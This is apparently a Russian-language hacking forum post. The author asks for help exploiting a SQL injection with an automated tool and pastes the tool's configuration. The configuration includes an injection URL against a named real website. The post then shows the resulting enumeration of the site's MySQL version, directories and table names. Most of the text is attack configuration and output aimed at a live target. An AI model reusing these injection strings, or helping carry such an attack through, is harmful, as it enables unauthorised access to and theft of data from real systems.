а так такую уязвимость через тулзу раскрутить ?
сам пытался, но ни через $source_sql ни через $f_url ни в [11] Mysql inj NAME_CONST ни в [12] Mysql inj floor(rand()) подобрать правильный вариант не получилось
Код:
$method = 1; # 1- Post; 0 - GET метод запросов | Post or Get method, 1-POST; 0-GET
$f_table = "information_schema.tables"; #
$f_url = "http://www.hack0wn.com/view.php?xroot=271.0+and+(select+1+from+"; # url
$f_plus = "+"; # %20,%2b & etc.
$f_filtr = "a)--+&cat=exploits"; # close SQL
-----------------------------------------
System information:
-----------------------------------------
base:hack0wn
basedir:/usr/
datadir:/var/lib/mysql/
os:redhat-linux-gnu
tmpdir:/tmp/
ver:5.0.86-log
-----------------------------------------
Tables in information_schema.tables - 27
-----------------------------------------
ROUTINES
VIEWS
SCHEMA_PRIVILEGES
advisories
SCHEMATA
bins
PROFILING
exploits
KEY_COLUMN_USAGE
comments
COLLATIONS
TABLE_CONSTRAINTS
profiles
COLUMN_PRIVILEGES
TABLE_PRIVILEGES
shellcodes
COLUMNS
TRIGGERS
sources
CHARACTER_SETS
TABLES
papers
COLLATION_CHARACTER_SET_APPLICABILITY
USER_PRIVILEGES
videos
STATISTICS
misc